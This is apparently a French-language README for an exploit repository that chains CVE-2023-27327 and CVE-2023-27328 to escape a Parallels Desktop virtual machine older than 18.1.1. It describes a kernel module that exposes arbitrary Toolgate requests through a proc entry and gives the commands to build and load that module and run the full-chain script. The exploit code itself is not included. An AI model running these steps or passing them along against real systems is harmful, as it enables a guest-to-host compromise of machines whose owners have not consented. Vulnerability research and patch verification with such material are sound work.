
Exploits for CVE-2023-27327 and CVE-2023-27328
Ce dépôt contient des exploits pour CVE-2023-27327 et CVE-2023-27328, qui peuvent être utilisés ensemble pour s'échapper d'une machine virtuelle Parallels Desktop, antérieure à Parallels Desktop 18.1.1.
Il contient également le code d'un module kernel requis, dans prl_mod, qui peut être utilisé pour envoyer des requêtes Toolgate arbitraires (< opcode 0x8000) depuis l'espace utilisateur, en utilisant une entrée proc créée à /proc/driver/prl_tg_pwn.
Construisez et chargez le module kernel :
cd prl_mod
make -f Makefile.kmods
sudo insmod ./prl_tg_pwn/Toolgate/Guest/Linux/prl_tg/prl_tg_pwn.ko
Exécutez l'exploit :
cd ..
pip install -r requirements.txt
./3_full_chain.py